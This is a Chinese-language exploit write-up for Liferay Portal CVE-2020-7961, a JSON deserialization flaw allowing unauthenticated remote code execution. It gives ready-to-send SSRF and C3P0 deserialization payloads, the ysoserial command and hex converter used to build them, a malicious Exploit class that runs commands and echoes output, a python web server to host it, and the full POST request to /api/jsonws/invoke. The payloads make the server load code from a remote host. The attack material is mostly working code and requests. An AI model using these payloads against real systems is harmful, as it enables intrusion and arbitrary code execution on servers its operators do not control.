Liferay Portal CVE-2020-7961

一、产品介绍

    Liferay（又称Liferay Portal）是一个开源门户项目，该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术，特别是其前台界面部分使用Struts 框架技术，基于XML的portlet配置文件可以自由地动态扩展，使用了Web Services来支持一些远程信息的获取，使用 Apache Lucene实现全文检索功能。

 

二、漏洞介绍

    Liferay Portal 多个比较严重的 JSON fan 反序列化漏洞，影响 Liferay Portal 6.1、6.2、7.0、7.1 以及 7.2 版本，这些漏洞可以通过 Json web 进行未授权远程代码执行。

影响范围：

Liferay Portal 6.1.X

Liferay Portal 6.2.X

Liferay Portal 7.0.X

Liferay Portal 7.1.X

Liferay Portal 7.2.X

 

三、poc

1、SSRF1：

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:javax.swing.JEditorPane={"page":"http://10.10.10.10","loginTimeout":0}

2、SSRF2：

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={"jndiName":"rmi://10.10.10.10/xxx","loginTimeout":0}

3、反序列化：

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A707070707070707070707874002D2F2F3531302E44455345522E38302E31313038332E7674702E73656375726974792E6875617765692E636F6D2F740004687474707400076578706C6F697470707070770400000000787702000178;"}

 

四、环境安装

下载集成了tomcat的liferay

https://cdn.lfrs.sl/releases.liferay.com/portal/7.1.2-ga3/liferay-ce-portal-tomcat-7.1.2-ga3-20190107144105508.7z

解压，修改tomcat启动端口，防止与其他端口冲突

加上调试接口，便于后续idea调试

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788   

双击启动startup.bat，如果tomcat报错，可能是调用了系统环境变量中的tomcat，删除系统环境变量中的tomcat即可。

 

五、构造poc

 

使用ysoserial生成poc二进制文件

java -jar ysoserial.jar C3P0 "http://127.0.0.1:8989/:Exploit" > 1.ser

再将二进制文件转换成hex字节码，转换源码如下：

import java.io.*;

public class yso2hex {

    public String encodeHex(InputStream fi) throws IOException {

        int size;

        String hexStr="";

        while ((size=fi.read())!=-1){

            String byteChar = Integer.toHexString(size);

            if(byteChar.length()<2) {

                byteChar = "0" + byteChar;

            }

            hexStr = hexStr + byteChar;

        }

        return hexStr;

    }

    public static void main(String[] args) throws IOException {

        FileInputStream fi  = new FileInputStream(new File("D:\\penetration\\poc\\1.ser"));

        yso2hex obj = new yso2hex();

        String pocStr = obj.encodeHex(fi);

        System.out.println(pocStr);

    }

}

转换结果如下，如果你发现你转换结果是F开头的，可能是执行ysoserial命令时使用了powershell，换成cmd。

aced000573720028636f6d2e6d6368616e67652e76322e633370302e506f6f6c4261636b656444617461536f75726365de22cd6cc7ff7fa802000078720035636f6d2e6d6368616e67652e76322e633370302e696d706c2e4162737472616374506f6f6c4261636b656444617461536f75726365000000000000000103000078720031636f6d2e6d6368616e67652e76322e633370302e696d706c2e506f6f6c4261636b656444617461536f757263654261736500000000000000010300084900106e756d48656c706572546872656164734c0018636f6e6e656374696f6e506f6f6c44617461536f757263657400244c6a617661782f73716c2f436f6e6e656374696f6e506f6f6c44617461536f757263653b4c000e64617461536f757263654e616d657400124c6a6176612f6c616e672f537472696e673b4c000a657874656e73696f6e7374000f4c6a6176612f7574696c2f4d61703b4c0014666163746f7279436c6173734c6f636174696f6e71007e00044c000d6964656e74697479546f6b656e71007e00044c00037063737400224c6a6176612f6265616e732f50726f70657274794368616e6765537570706f72743b4c00037663737400224c6a6176612f6265616e732f5665746f61626c654368616e6765537570706f72743b7870770200017372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e000a4c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f727971007e00044c0014636c617373466163746f72794c6f636174696f6e71007e00044c0009636c6173734e616d6571007e00047870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740018687474703a2f2f31302e37302e362e3133303a393939392f7400076578706c6f697470707070770400000000787702000178

C3P0会在http://127.0.0.1:8989/下加载恶意类Exploit，其中恶意类如下所示：

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

        } catch (Exception e) {

        }

    }

}

如需要回显，可使用下面源码，通过获取context得到相关接口：

import com.liferay.portal.kernel.security.access.control.AccessControlUtil;

import com.liferay.portal.kernel.security.auth.AccessControlContext;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.io.OutputStream;

 

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

            AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();

            HttpServletResponse response =  accessControlContext.getResponse();

            OutputStream ot =  response.getOutputStream();

            ot.write("hei hei hei".getBytes());

            ot.flush();

            ot.close();

        } catch (Exception e) {

 

        }

    }

}

将上面源码保存于Exploit.java，然后使用下面命令进行编译

javac Exploit.java

然后使用python启动一个web服务，命令如下：

Python3 -m http.server 8989

注：windows下敲命令如果使用powershell，注意编码，建议使用cmd

 

六、构造恶意报文

恶意报文如下，将前面hex字节码填入其中。

POST /api/jsonws/invoke HTTP/1.1

Host: 127.0.0.1:9088

Content-Length: 2305

Content-Type: application/x-www-form-urlencoded

Connection: close

 

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A70707070707070707070787400074578706C6F6974740018687474703A2F2F31302E37302E362E3133303A393939392F7400076578706C6F697470707070770400000000787702000178;"}

打他：

 

六、调试

将项目导入IDEA进行调试，将如下目录右键add as library

增加remote configurations，并做如下配置：

启动后即可愉快的调试了。